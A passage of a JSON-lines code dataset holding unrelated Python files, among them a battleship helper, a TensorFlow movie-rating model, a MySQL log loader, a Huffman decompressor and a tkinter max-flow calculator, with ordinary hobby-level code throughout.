\"\"\"\n temp_bombs = {}\n for bomb in self.__bomb_on_board:\n if self.__bomb_on_board[bomb] != 1:\n self.__bomb_on_board[bomb] -= 1\n temp_bombs[bomb] = self.__bomb_on_board[bomb]\n self.__bomb_on_board = temp_bombs\n\n def damaged_pos(self):\n \"\"\"\n append damaged positions of ships on the board\n \"\"\"\n self.__hit_ship_cells = []\n for ship in self.__ships:\n for pos in ship.coordinates():\n if pos in ship.damaged_cells():\n self.__hit_ship_cells.append(pos)\n\n def not_damaged_pos(self):\n \"\"\"\n append non-damaged positions of ships on the board\n \"\"\"\n self.__healthy_ships = []\n for ship in self.__ships:\n for pos in ship.coordinates():\n if pos not in ship.damaged_cells():\n self.__healthy_ships.append(pos)\n\n def last_hit(self):\n \"\"\"\n count the number of hits and returns a list of hits positions and\n the number of hits\n :return: a list of hits positions and the number of hits\n \"\"\"\n hits = []\n hits_counter = 0\n for pos in self.__bomb_on_board:\n for ship in self.__ships:\n if ship.hit(pos):\n hits.append(pos)\n hits_counter += 1\n hits_count = [hits, hits_counter]\n return hits_count\n\n def remove_items(self, list_of_coordinates):\n \"\"\"\n remove items from a given dictionary that appear in a given list\n :param list_of_coordinates: a list\n \"\"\"\n for key in list_of_coordinates:\n if key in self.__bomb_on_board:\n del self.__bomb_on_board[key]\n","sub_path":"ex8/ship_helper.py","file_name":"ship_helper.py","file_ext":"py","file_size_in_byte":7170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"640022064","text":"import tkinter as tk\nfrom tkinter import messagebox\nimport time\n\ndef sleeper():\n while True:\n # Gets the user input on time they want\n np = input('I want an update every X minutes: ')\n\n # tries to convert input into a floating point number in minutes\n try:\n np = float(np)*60\n except ValueError:\n print('Please enter a number\\n')\n continue\n \n # runs the time.sleep() command\n # shows before and after time that the program was run \n print('Time before the program ran: %s' % time.ctime() )\n time.sleep(np)\n\n # function that I want to reoccur activation commands go here:\n \n # creates the window/pop up \n root = tk.Tk() \n\n canvas1 = tk.Canvas(root, width = 800, height = 500)\n canvas1.pack()\n\n button1 = tk.Button (root, text='Exit Application', command=ExitApplication)\n canvas1.create_window(97, 270, window=button1)\n\n root.mainloop()\n\n print('Time after the program completed: %s' % time.ctime() )\n\ndef ExitApplication():\n MsgBox = tk.messagebox.askquestion('Exit Application', 'Are you sure that you want to exit this application?', icon='warning')\n if MsgBox == 'yes':\n root.destroy()\n else:\n tk.messagebox.showinfo('Return', 'You will now return to the application screen')\n\ntry:\n sleeper()\nexcept KeyboardInterrupt:\n print('\\n\\nKeyboard exception received. Exiting.')\n exit()\n","sub_path":"unused/sleeper.py","file_name":"sleeper.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"376822975","text":"import os\r\nfrom operator import itemgetter\r\nMenu = '0 - Выход из программы\\n1 - Количество файлов в директории\\n2 - Сортировка данных файла products.txt по названию\\n'\r\nMenu2 = '0 - Назад\\n1 - Уменьшить количество продуктов\\n2 - Сохранить в исходный файл\\n3 - Сохранить в указанную директорию\\n'\r\nflagIn = ''\r\nproductsList = []\r\n\r\ndef filesCount():\r\n link = str(input('Введите путь к директори��\\n'))\r\n print(\"Количество файлов в директории:\" + str(len(next(os.walk(link))[2])))\r\n \r\ndef fileReading(productsList):\r\n global first_str\r\n with open('C:/users/Кирилл/Desktop/products.txt') as f:\r\n for line in f:\r\n productsList.append([x for x in line.rstrip('\\n').split(';')])\r\n first_str = productsList[0]\r\n del productsList[0]\r\n return productsList\r\n\r\ndef listSorting(productsList):\r\n productsList.sort(key=itemgetter(1))\r\n return productsList\r\n \r\ndef quantityReduction(productsList, numbers, count):\r\n for i in productsList:\r\n for j in numbers:\r\n if i[0] == j:\r\n i[3] = str(int(i[3]) - int(count))\r\n return productsList\r\n\r\ndef saveNewFile(productsList):\r\n link = input('Введите путь к директории: \\n')\r\n with open(link+\"\\products.txt\", \"w\") as f:\r\n f.write(';'.join(first_str)+'\\n')\r\n i = 0\r\n while i= 0:\r\n revenue_total += revenue\r\n if budget >= 0:\r\n budget_total += budget\r\n #text\r\n release_date = row[13]\r\n title = row[19]\r\n companies_text = row[12] #need to be parsed, class\r\n genres_text = row[3]\r\n x_genres_text.append(genres_text)\r\n x_companies_text.append(companies_text)\r\n\r\n genre_array = ast.literal_eval(genres_text)\r\n company_array = ast.literal_eval(companies_text)\r\n\r\n for genre in genre_array:\r\n genres_set.add(genre['id'])\r\n\r\n for company in company_array:\r\n companies_set.append(company['id'])\r\n \r\n\r\n #need to be parsed, to float32\r\n orig_title = row[8]\r\n overview = row[9]\r\n\r\n #추측값\r\n vote_average = row[22]\r\n vote_count = row[23]\r\n\r\n #이미지?\r\n\r\n #test\r\n x_train_text.append(title + ' ' + overview)\r\n y_train_point[index] = (float(vote_average))\r\n index += 1\r\n\r\n\r\n\r\nbudget_avg = budget_total/index\r\nrevenue_avg = revenue_total/index\r\n\r\nfor row in range(index):\r\n if x_train_others[i][2] == 0:\r\n x_train_others[i][2] = revenue_avg\r\n if x_train_others[i][0] == 0:\r\n x_train_others[i][0] = budget_avg\r\n \r\n# convert set into list\r\n\r\ngenres_set = list(genres_set)\r\ncompanies_counter = Counter(companies_set)\r\ncompanies_set = list()\r\n\r\nfor k, v in companies_counter.most_common(100):\r\n companies_set.append(k)\r\n\r\n# genre one-hot encode\r\nx_train_genres = np.zeros((row_count, len(genres_set)))\r\nfor i in range(len(x_genres_text)):\r\n genre_array = ast.literal_eval(x_genres_text[i])\r\n\r\n for genre in genre_array:\r\n idx = genres_set.index(genre['id'])\r\n if idx >= 0:\r\n x_train_genres[i][idx] = 1\r\n\r\n# company one-hot encode\r\nx_train_companies = np.zeros((row_count, len(companies_set)))\r\nfor i in range(len(x_companies_text)):\r\n companies_array = ast.literal_eval(x_companies_text[i])\r\n\r\n for company in companies_array:\r\n try:\r\n idx = companies_set.index(company['id'])\r\n x_train_companies[i][idx] = 1\r\n except:\r\n pass\r\n\r\n# Text 준비\r\ncontents = tool.cut(x_train_text, 6)\r\nmax_document_length = 256\r\nx, vocabulary, vocab_size = tool.make_input(contents,max_document_length)\r\n\r\nx_train, x_test, y_train, y_test = x[list(range(5000))+list(range(-2500,0))], x[5000:6000], y_train_point[list(range(5000))+list(range(-2500,0))], y_train_point[5000:6000]\r\n\r\n#train reshape\r\nx_train = x_train.astype(np.float32)\r\nx_train = x_train.reshape(x_train.shape[0], 16, 16, 1)\r\ny_train = y_train.reshape(y_train.shape[0], 1)\r\n\r\n#test reshape\r\nx_test = x_test.astype(np.float32)\r\nx_test = x_test.reshape(x_test.shape[0], 16, 16, 1)\r\ny_test = y_test.reshape(y_test.shape[0], 1)\r\n\r\n\r\n# Text CNN\r\nX = tf.placeholder(tf.float32, [None, 16, 16, 1])\r\nY = tf.placeholder(tf.float32, [None, 1])\r\nis_training = tf.placeholder(tf.bool)\r\n\r\nL1 = tf.layers.conv2d(X, 32, [3, 3], activation=tf.nn.relu)\r\nL1 = tf.layers.max_pooling2d(L1, [2, 2], [2, 2])\r\nL1 = tf.layers.dropout(L1, 0.7, is_training)\r\n\r\nL2 = tf.layers.conv2d(L1, 64, [3, 3], activation=tf.nn.relu)\r\nL2 = tf.layers.max_pooling2d(L2, [2, 2], [2, 2])\r\nL2 = tf.layers.dropout(L2, 0.7, is_training)\r\n\r\nL3 = tf.contrib.layers.flatten(L2)\r\nL3 = tf.layers.dense(L3, 128, activation=tf.nn.relu)\r\nL3 = tf.layers.dropout(L3, 0.5, is_training)\r\n\r\nL4 = tf.contrib.layers.flatten(L3)\r\nL4 = tf.layers.dense(L4, 256, activation=tf.nn.relu)\r\nL4 = tf.layers.dropout(L4, 0.5, is_training)\r\n\r\nmodel = tf.layers.dense(L4, 1, activation=None)\r\n\r\n#CNN End\r\n\r\n#Image CNN\r\nx_image_train, x_image_test = x_train_images[list(range(5000))+list(range(-2500,0))], x_train_images[5000:6000]\r\n\r\nX_image = tf.placeholder(tf.float32, [None, IMAGE_WIDTH, IMAGE_HEIGHT, 3])\r\n\r\nis_training = tf.placeholder(tf.bool)\r\n\r\nL1_image = tf.layers.conv2d(X_image, 32, [3, 3], activation=tf.nn.relu)\r\nL1_image = tf.layers.max_pooling2d(L1_image, [2, 2], [2, 2])\r\nL1_image = tf.layers.dropout(L1_image, 0.7, is_training)\r\n\r\nL2_image = tf.layers.conv2d(L1_image, 64, [3, 3], activation=tf.nn.relu)\r\nL2_image = tf.layers.max_pooling2d(L2_image, [2, 2], [2, 2])\r\nL2_image = tf.layers.dropout(L2_image, 0.7, is_training)\r\n\r\nL3_image = tf.contrib.layers.flatten(L2_image)\r\nL3_image = tf.layers.dense(L3_image, 128, activation=tf.nn.relu)\r\nL3_image = tf.layers.dropout(L3_image, 0.5, is_training)\r\n\r\nL4_image = tf.contrib.layers.flatten(L3_image)\r\nL4_image = tf.layers.dense(L4_image, 128, activation=tf.nn.relu)\r\nL4_image = tf.layers.dropout(L4_image, 0.5, is_training)\r\n\r\nimage_model = tf.layers.dense(L4_image, 1, activation=None)\r\n\r\n# Linear Regression (Genre)\r\nx_genre_train, x_genre_test = x_train_genres[list(range(5000))+list(range(-2500,0))], x_train_genres[5000:6000]\r\n\r\nX_genre = tf.placeholder(tf.float32, [None, x_train_genres.shape[1]])\r\n\r\nW_g1 = tf.Variable(tf.random_uniform([x_train_genres.shape[1], x_train_genres.shape[1]], -0.1, 0.1))\r\nW_g2 = tf.Variable(tf.random_uniform([x_train_genres.shape[1], 1], -0.1, 0.1))\r\nb_g = tf.Variable(tf.random_uniform([1], -1.0, 1.0))\r\n\r\nhypothesis_g = tf.matmul(tf.matmul(X_genre, W_g1), W_g2) + b_g\r\n\r\n#Linear Regression (Company)\r\nx_company_train, x_company_test = x_train_companies[list(range(5000))+list(range(-2500,0))], x_train_companies[5000:6000]\r\n\r\nX_company = tf.placeholder(tf.float32, [None, x_train_companies.shape[1]])\r\n\r\nW_c1 = tf.Variable(tf.random_uniform([x_train_companies.shape[1], x_train_companies.shape[1]], -0.1, 0.1))\r\nW_c2 = tf.Variable(tf.random_uniform([x_train_companies.shape[1], 1], -0.1, 0.1))\r\nb_c = tf.Variable(tf.random_uniform([1], -1.0, 1.0))\r\n\r\nhypothesis_c = tf.matmul(tf.matmul(X_company, W_c1), W_c2) + b_c\r\n\r\n# Linear regression (budget, popularity, revenue, runtime)\r\nx_other_train, x_other_test = x_train_others[list(range(5000))+list(range(-2500,0))], x_train_others[5000:6000]\r\n\r\nX_other = tf.placeholder(tf.float32, [None, 4])\r\nW1 = tf.Variable(tf.random_uniform([4, 16], -0.01, 0.01))\r\nW2 = tf.Variable(tf.random_uniform([16, 1], -0.01, 0.01))\r\nb = tf.Variable(tf.random_uniform([1], -1.0, 1.0))\r\n\r\nhypothesis = tf.matmul(tf.matmul(X_other, W1), W2) + b\r\n\r\n\r\n# Final\r\nfinal = hypothesis*2 + model*2 + hypothesis_g + hypothesis_c * 3 #+ image_model\r\n\r\n#vote_average 0 ~ 10\r\ncost = tf.reduce_mean(tf.square(final - Y))\r\noptimizer = tf.train.AdamOptimizer(0.0005).minimize(tf.reduce_mean(tf.square(final - Y) + tf.nn.l2_loss(W_c2) * 0.01 + tf.nn.l2_loss(W_c1) * 0.01 + tf.nn.l2_loss(W_g1) * 0.01 + tf.nn.l2_loss(W_g2) * 0.01 + tf.nn.l2_loss(W1) * 0.01 + tf.nn.l2_loss(W2) * 0.01 ))\r\n#optimizer = tf.train.AdamOptimizer(0.0005).minimize(cost)\r\n\r\n#########\r\n# 신경망 모델 학습\r\n######\r\ninit = tf.global_variables_initializer()\r\nsess = tf.Session()\r\nsess.run(init)\r\n\r\nbatch_size = 25\r\ntotal_batch = int(x_train.shape[0]/batch_size)\r\nmin_cost = 0.7\r\n\r\nfor i in range(500):\r\n init = tf.global_variables_initializer()\r\n sess = tf.Session()\r\n sess.run(init)\r\n for epoch in range(5000):\r\n total_cost = 0\r\n \r\n for i in range(total_batch):\r\n batch_xs, batch_ys = x_train[i*batch_size:(i+1)*batch_size], y_train[i*batch_size:(i+1)*batch_size]\r\n _, cost_val = sess.run([optimizer, cost],\r\n feed_dict={X: batch_xs,\r\n X_other: x_other_train[i*batch_size:(i+1)*batch_size],\r\n X_image: x_image_train[i*batch_size:(i+1)*batch_size],\r\n X_genre: x_genre_train[i*batch_size:(i+1)*batch_size],\r\n X_company: x_company_train[i*batch_size:(i+1)*batch_size],\r\n Y: batch_ys,\r\n is_training: True})\r\n total_cost += cost_val\r\n \r\n print('Epoch:', '%04d' % (epoch + 1),\r\n 'Avg. cost =', '{:.4f}'.format(total_cost / total_batch))\r\n \r\n print('test set cost\\n')\r\n test_cost = sess.run([cost], feed_dict={X: x_test, X_other: x_other_test, X_genre:x_genre_test, X_company: x_company_test, X_image: x_image_test, Y:y_test, is_training: False})\r\n print(test_cost)\r\n \r\n print('min_cost: ', min_cost)\r\n if test_cost[0] <= min_cost:\r\n min_cost = test_cost\r\n saver = tf.train.Saver()\r\n saver.save(sess, './best_model')\r\n \r\nfor i in range(100):\r\n print(i, 'real : ', y_test[i])\r\n print(sess.run([final], feed_dict={X: x_test[i:i+1], X_other: x_other_test[i:i+1], X_image: x_image_test[i:i+1], X_company:x_company_test[i:i+1], X_genre: x_genre_test[i:i+1], Y: y_test[i:i+1], is_training: False}))\r\n\r\nprint('test set cost\\n')\r\nprint(sess.run([cost], feed_dict={X: x_test, X_other: x_other_test, X_genre:x_genre_test, X_company: x_company_test, X_image: x_image_test, Y:y_test, is_training: False}))","sub_path":"Movie_Prediction(원본)/Example/Example2_0.948/main_model_train.py","file_name":"main_model_train.py","file_ext":"py","file_size_in_byte":10533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"441233977","text":"# Source : https://leetcode.com/problems/unique-binary-search-trees/\n# Author : Phat Nguyen\n# Date : 2015-03-25\n\n\"\"\"\nPROBLEM:\nGiven n, how many structurally unique BST's (binary search trees) that store values 1...n?\n\nFor example,\nGiven n = 3, there are a total of 5 unique BST's.\n\n 1 3 3 2 1\n \\ / / / \\ \\\n 3 2 1 1 3 2\n / / \\ \\\n 2 1 2 3\n\nSOLUTION:\n\n\"\"\"\n\nclass Solution:\n # @return an integer\n def numTrees(self, n):\n a = [1, 1, 2, 5]\n if n <= 3: return a[n]\n for i in range(4, n + 1):\n num = 0\n mid = (i-1)/2\n for j in range(0, i):\n num += a[j] * a[i - j - 1]\n a.append(num)\n return a[n]\n","sub_path":"py/96.py","file_name":"96.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"576068069","text":"#!/usr/bin/env python3\n\n'''\n Log Loader\n Written by Jacob Sorensen\n 05 November 2019\n\n A quick tool to load Humble Pie stats from its log into the\n MySQL DB on borfaxer.com\n'''\n\nimport argparse\nfrom datetime import datetime\nimport json\nimport logging\nimport mysql.connector\nimport os\nimport sys\n#import time\n\ndescription = \"Log Loader\"\n\n\ndef main():\n\n parser = argparse.ArgumentParser(description=description)\n parser.add_argument('--conf', required=False, default='/etc/conf/lifeline/lifeline_conf.json', help='config file path')\n\n args = parser.parse_args()\n\n config = json.load(open(args.conf, 'r'))\n\n # Double check the logging path exists, create if it doesn't\n\n if not os.path.exists(config['logging']['path']):\n os.makedirs(config['logging']['path'])\n\n log_file = config['logging']['path'] + '/' + config['logging']['filename']['log_loader']\n logging.basicConfig(filename=log_file,\n format=config['logging']['format'],\n level=logging.INFO)\n logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))\n logging.info('Starting %s with logging level set to %s', description, logging.getLevelName(logging.getLogger().getEffectiveLevel()))\n logging.info('Read config file %s', args.conf)\n\n '''\n There are two activities to perform:\n 1) Dig through the log and extract the data that\n should be in the DB\n 2) Insert the values (ignoring duplicates)\n '''\n\n # Stage 1: Collect the data from logs\n hp_log_filename = log_file = config['logging']['path'] + '/' + config['logging']['filename']['humble_pie']\n\n # Stage 2: Insert the data\n db = mysql.connector.connect(user = config['mysql']['user'],\n host = config['mysql']['host'],\n password = config['mysql']['password'],\n database = config['mysql']['database'])\n db_cursor = db.cursor()\n last_entry_cursor = db.cursor(buffered=True)\n\n # IGNORE tells MySQL to skip duplicate rows without erroring\n\n insert_sql = (\"INSERT IGNORE INTO lifeline_data\"\n \"(timestamp, ping, downwidth, upwidth, source_ip, source_machine, test_server)\"\n \"VALUES (%s, %s, %s, %s, %s, %s, %s)\")\n\n source_ip = ''\n source_machine = config['source_machine']\n logging.info('Using \\'%s\\' as the source machine', source_machine)\n\n last_entry_sql = \"SELECT max(timestamp) FROM lifeline_data WHERE source_machine LIKE '{}'\".format(source_machine)\n last_entry_cursor.execute(last_entry_sql)\n last_entry = None\n for (timestamp, ) in last_entry_cursor:\n last_entry = timestamp.strftime('%Y-%m-%d %H:%M:%S')\n logging.info('Last entry in the DB for %s is from %s', source_machine, last_entry)\n\n log_data = []\n\n with open(hp_log_filename, 'r') as hp_log:\n for line in hp_log:\n if 'Your IP: ' in line:\n old_source_ip = source_ip\n source_ip = line.split(':')[4].strip()\n if old_source_ip != source_ip:\n logging.info('Changing source_ip from %s to %s', old_source_ip, source_ip)\n elif \"Could not report to \" in line:\n #logging.info('Parsing data: \\'%s\\'', '{' + line.split('{')[1])\n jd = json.loads('{' + line.split('{')[1])\n timestamp_object = datetime.fromtimestamp(jd['timestamp'])\n formatted_time = timestamp_object.strftime('%Y-%m-%d %H:%M:%S')\n if formatted_time > last_entry:\n data_tuple = (formatted_time,\n jd['ping'],\n jd['downwidth'],\n jd['upwidth'],\n source_ip,\n source_machine,\n jd['test_server'])\n logging.info('Inserting data for timestamp %s into %s:%s:%s', formatted_time, config['mysql']['host'], config['mysql']['database'], 'lifeline_data')\n db_cursor.execute(insert_sql, data_tuple)\n\n db.commit()\n db_cursor.close()\n db.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"log_loader.py","file_name":"log_loader.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"283953001","text":"# UID: 180128022\r\n\r\n# Importing Pickle module\r\nimport pickle, time, sys, os\r\n\r\nclass HuffmanDecompress:\r\n def __init__(self, Dictionary, Code): \r\n self.Dictionary = Dictionary\r\n self.Code = Code\r\n \r\n def Convert(self): \r\n Binary = \"\"\r\n for b in self.CodeDecompressed:\r\n Str = bin(b)\r\n Str = Str[2:] \r\n Padding = \"\"\r\n for zero in range(0, 8 - len(Str)):\r\n Padding += \"0\" \r\n Str = Padding + Str\r\n Binary += Str\r\n self.Binary = Binary\r\n \r\n def CodeReader_ReaderDict(self): # Reading the compressed file\r\n CodeDecompressed = open(self.Code, \"rb\")\r\n CodeDecompressed = CodeDecompressed.read()\r\n self.CodeDecompressed = CodeDecompressed\r\n DictDecompressed = open(self.Dictionary, \"rb\")\r\n DictDecompressed = pickle.load(DictDecompressed)\r\n self.DictDecompressed = DictDecompressed\r\n \r\n def Decoder(self): \r\n FinalStr = dict((value, key) for key, value in self.DictDecompressed.items())\r\n StrDecoded = \"\"\r\n ToCheck = \"\"\r\n for element in self.Binary:\r\n ToCheck += element\r\n try:\r\n char = FinalStr[ToCheck]\r\n StrDecoded += char\r\n ToCheck = \"\"\r\n except KeyError: continue\r\n OriginalStr = StrDecoded.replace(\"EOF\",\"\")\r\n filename, file_extension = os.path.splitext(self.Code)\r\n infile = open(\"{}-decompressed.txt\".format(filename), \"w\")\r\n infile.write(OriginalStr) \r\n infile.close()\r\n \r\nStartTimeTotal = time.clock()\r\nsymbol = sys.argv[1]\r\nfilename, file_extension = os.path.splitext(symbol)\r\nInstanceofHuffman = HuffmanDecompress('{}-symbol-model.pkl'.format(filename), symbol)\r\nreaderdict_codereader = InstanceofHuffman.CodeReader_ReaderDict()\r\nbinaryconvert = InstanceofHuffman.Convert()\r\nStartTime = time.clock()\r\ntodecode = InstanceofHuffman.Decoder()\r\nStopTime = time.clock()\r\nprint(\"Time taken to decode\", StopTime-StartTime)\r\nStopTimeTotal = time.clock()\r\nprint(\"Total Time taken for Decompression\", StopTimeTotal-StartTimeTotal)","sub_path":"huff-decompress.py","file_name":"huff-decompress.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"216363354","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split\n\n\ndef format_data(df):\n temp = []\n idx = df.index\n for i in idx:\n temp.append([[item] for item in df.iloc[i]])\n temp = np.array(temp, dtype=float)\n return temp\n\n\ndef load_clean_data(csv_file):\n # Load all data\n data = pd.read_csv(csv_file)\n # Remove Unnecessary columns\n clean_data = data.drop(labels=['Unnamed: 0', 'Unnamed: 0.1','Unnamed: 0.1.1',\n 'date', 'readings', 'sensors', 'time'],\n axis=1)\n return clean_data\n\n\ndef shuffle_split_dataset(X, y):\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,\n random_state=42, shuffle=True)\n return X_train, y_train, X_test, y_test\n\n\ndef extract_categories(y):\n cats = []\n for element in y:\n if element not in cats:\n cats.append(element)\n return cats\n\n\n\ndef load_preprocess_data():\n csv_file1 = 'Dataset/Aruba/BDL_test2.csv'\n csv_file2 = 'Dataset/Aruba/BDL_train2.csv'\n # Create a clean dataset\n clean_data_1 = load_clean_data(csv_file1)\n clean_data_2 = load_clean_data(csv_file2)\n clean_data = pd.concat([clean_data_1, clean_data_2])\n # Shuffle Data\n clean_data_sampled = clean_data.sample(frac=1).reset_index(drop=True)\n return clean_data\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"199136431","text":"from scipy import optimize\nimport numpy as np\nfrom .pondering import proximity_ponderation,outlier_ponderation\nfrom math import pi\n\ndef trigono_plus_lineal(A,t):\n #Declares an equiation to model the behavior of the star\n return A[0]*np.cos(A[2]*t)+A[1]*np.sin(A[2]*t)+A[3]+A[4]*t\n\ndef error_function(A,t,y,w):\n #Returns the error of the function\n return (trigono_plus_lineal(A,t)-y)*w\n\ndef jac_errfunc(A,t,y,w):\n jac_err= np.zeros((5,t.shape[0]))\n jac_err[0,:]= np.cos(A[2]*t)\n jac_err[1,:]= np.sin(A[2]*t)\n jac_err[2,:]= (-A[0]*np.sin(A[2]*t)+A[1]*np.cos(A[2]*t))*t\n jac_err[3,:]= 1.0\n jac_err[4,:]= t\n return jac_err*w\n\ndef fit(data,cycles_guess=2.0):\n #Fits the funtion to the points while mainting least error\n data= np.array(data)\n xdata= data[:,0]\n ydata= data[:,1]\n ponderation= proximity_ponderation(xdata)*outlier_ponderation(ydata)\n mean= np.sum(ydata*ponderation)/np.sum(ponderation)\n stdev= np.std(ydata*ponderation)/np.sum(ponderation)\n rangx= np.amax(xdata)-np.amin(xdata)\n w0= cycles_guess*2*pi/rangx\n A0= [stdev,stdev,w0,mean,0.0]\n fit= optimize.leastsq(error_function, A0, args=(xdata,ydata,ponderation), Dfun=jac_errfunc, col_deriv=True)\n function= lambda t: trigono_plus_lineal(fit[0],t)\n fit= list(fit)\n fit.append(function)\n return fit\n","sub_path":"varstarscan/fitting.py","file_name":"fitting.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"461919419","text":"from PyQt5.QtWidgets import QApplication, QLabel, QGroupBox, QFrame, QVBoxLayout, QDialog, QRadioButton, QGridLayout\n\nclass View(QDialog):\n def __init__(self):\n super(View, self).__init__(None)\n self.createOutputWidget()\n self.createDataWidget()\n self.createGraphWidget()\n self.createConsoleWidget()\n\n mainLayout = QGridLayout()\n mainLayout.addWidget(self.OutputWidget, 0, 0, 3, 3)\n mainLayout.addWidget(self.DataWidget, 0, 4, 3, 1)\n mainLayout.addWidget(self.GraphWidget, 4, 0, 2, 3)\n mainLayout.addWidget(self.ConsoleWidget, 4, 4, 2, 1)\n\n self.setLayout(mainLayout)\n\n def createOutputWidget(self):\n self.OutputWidget = QGroupBox(\"Output\")\n\n temp = QRadioButton(\"1\")\n layout = QVBoxLayout()\n layout.addWidget(temp)\n layout.addStretch()\n self.OutputWidget.setLayout(layout)\n\n def createDataWidget(self):\n self.DataWidget = QGroupBox(\"Dataset\")\n\n temp = QRadioButton(\"2\")\n layout = QVBoxLayout()\n layout.addWidget(temp)\n layout.addStretch()\n self.DataWidget.setLayout(layout)\n \n def createGraphWidget(self):\n self.GraphWidget = QGroupBox(\"Graph\")\n\n temp = QRadioButton(\"3\")\n layout = QVBoxLayout()\n layout.addWidget(temp)\n layout.addStretch()\n self.GraphWidget.setLayout(layout)\n \n def createConsoleWidget(self):\n self.ConsoleWidget = QGroupBox(\"Console\")\n\n temp = QRadioButton(\"4\")\n layout = QVBoxLayout()\n layout.addWidget(temp)\n layout.addStretch()\n self.ConsoleWidget.setLayout(layout)\n\ndef main():\n main_view = QApplication([])\n view = View()\n view.resize(700, 700)\n view.show()\n main_view.exec_()\n\nif __name__ == \"__main__\":\n main()","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"379624837","text":"from tkinter import *\nfrom tkinter import ttk\n\nclass Aplicacion():\n def __init__(self):\n self.raiz = Tk()\n self.raiz.title(\"Flujo Maximo\")\n self.raiz.resizable(False,False)\n self.grafo = [[0,30,15,0,0,0,0,0,0,0],\n [50,0,0,7,40,0,0,0,0,0],\n [0,0,0,20,0,11,0,12,0,0],\n [0,5,0,0,0,18,0,0,25,0],\n [0,0,0,0,0,0,11,11,11,17],\n [20,17,0,0,5,0,0,22,0,0],\n [0,18,0,27,0,0,0,0,1,0],\n [0,0,0,0,0,0,0,0,0,0],\n [24,0,33,0,0,0,20,0,0,0],\n [42,0,0,0,10,0,20,33,0,0]]\n self.pares = [0 for x in range(len(self.grafo))]\n###################################################Variables\n self.n1 = IntVar(value=9)\n self.inicial = self.n1.get()\n self.n2 = IntVar(value=0)\n self.final = self.n2.get()\n self.total = IntVar(value=0)\n#Elementos de Tkinter\n self.etiq2 = ttk.Label(self.raiz, text=\"CASAS: 0-9\")\n self.etiq3 = ttk.Label(self.raiz, text=\"Casa Inicial:\")\n self.dist = ttk.Entry(self.raiz, textvariable=self.n1, width=10)\n self.etiq4 = ttk.Label(self.raiz, text=\"Casa Final:\")\n self.coste = ttk.Entry(self.raiz, textvariable=self.n2, width=10)\n self.etiq5 = ttk.Label(self.raiz, text=\"Flujo Maximo:\")\n self.etiq6 = ttk.Label(self.raiz, textvariable=self.total, foreground=\"yellow\", background=\"black\", borderwidth=5, anchor=\"e\")\n self.separ1 = ttk.Separator(self.raiz, orient=HORIZONTAL)\n self.boton1 = ttk.Button(self.raiz, text=\"Calcular\", command=self.calcular)\n self.boton2 = ttk.Button(self.raiz, text=\"Salir\", command=quit)\n \n self.etiq2.pack(side=TOP, fill=BOTH, expand=True, padx=10, pady=5)\n self.etiq3.pack(side=TOP, fill=BOTH, expand=True, padx=10, pady=5)\n self.dist.pack(side=TOP, fill=X, expand=True, padx=20, pady=5)\n self.etiq4.pack(side=TOP, fill=BOTH, expand=True, padx=10, pady=5)\n self.coste.pack(side=TOP, fill=X, expand=True, padx=20, pady=5)\n self.etiq5.pack(side=TOP, fill=BOTH, expand=True, padx=10, pady=5)\n self.etiq6.pack(side=TOP, fill=BOTH, expand=True, padx=20, pady=5)\n self.separ1.pack(side=TOP, fill=BOTH, expand=True, padx=5, pady=5)\n self.boton1.pack(side=LEFT, fill=BOTH, expand=True, padx=10, pady=10)\n self.boton2.pack(side=RIGHT, fill=BOTH, expand=True, padx=10, pady=10) \n self.raiz.mainloop()\n######################################################\n def flujoMasCorto(self):\n grafo = self.grafo\n pares = self.pares\n inicial2 = int(self.inicial)#\n cola = []\n visitados = [False for x in range(len(grafo))]\n cola.append(inicial2)\n visitados[inicial2] = True\n while len(cola):\n nodo = cola.pop(0)\n for principal,adyacente in enumerate(grafo[nodo]):\n if visitados[principal] == False and adyacente > 0:\n cola.append(principal)\n visitados[principal] = True\n pares[principal] = nodo\n if visitados[self.final] == True:\n return True\n return False\n def flujoMaximo(self):\n flujoTotal = 0\n pares = self.pares\n grafo = self.grafo\n while self.flujoMasCorto():\n aux = self.final\n k = float('inf')\n #K\n while aux != self.inicial:\n k = min(k,grafo[pares[aux]][aux])\n aux = pares[aux]\n flujoTotal += k\n v = self.final\n #sumando y restando\n while v != self.inicial:\n u = pares[v]\n grafo[u][v] -= k\n grafo[v][u] += k\n v = pares[v]\n return flujoTotal\n#####################################################\n \n#Boton Calcular\n def calcular(self):\n error_dato = False\n total = 0\n #asegurarse de que sea un int\n try:\n n1 = int(self.n1.get())\n n2 = int(self.n2.get())\n except:\n error_dato = True\n if not error_dato:\n self.inicial = self.n1.get()\n self.final = self.n2.get()\n total = self.flujoMaximo()\n print(total)#print en consola\n self.total.set(total)#print en el label negro\n else:\n self.total.set(\"¡ERROR!\")#otros valores\n#Funcion principal\ndef main():\n mi_app = Aplicacion()\n return 0\n#condicional para prevenir una doble llamada desde otro archivo python\nif __name__ == '__main__':\n main()\n","sub_path":"flujomaximo.py","file_name":"flujomaximo.py","file_ext":"py","file_size_in_byte":4573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"27518771","text":"import numpy as np\n\n\ndef 